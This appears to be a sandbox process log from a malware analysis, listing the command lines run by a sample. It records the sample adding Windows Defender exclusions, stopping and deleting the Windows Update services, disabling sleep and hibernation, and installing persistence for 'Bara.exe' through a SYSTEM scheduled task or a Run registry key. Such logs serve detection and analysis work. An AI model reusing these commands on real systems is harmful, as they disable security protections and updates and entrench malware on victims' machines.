Tbcelsmfm.exe "C:\Users\test22\AppData\Local\Temp\Tbcelsmfm.exe"
2764powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
3012cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2820sc.exe sc stop UsoSvc
2868sc.exe sc stop WaaSMedicSvc
2316sc.exe sc stop wuauserv
3028sc.exe sc stop bits
2932sc.exe sc stop dosvc
2952reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
2840reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
1788reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
2688reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
1336reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2292cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1376powercfg.exe powercfg /x -hibernate-timeout-ac 0
2700powercfg.exe powercfg /x -hibernate-timeout-dc 0
2148powercfg.exe powercfg /x -standby-timeout-ac 0
1316powercfg.exe powercfg /x -standby-timeout-dc 0
2076powershell.exe powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
812powershell.exe powershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }
2256MLjvrefsd5vf1.exe "C:\Users\test22\AppData\Local\Temp\MLjvrefsd5vf1.exe"
2852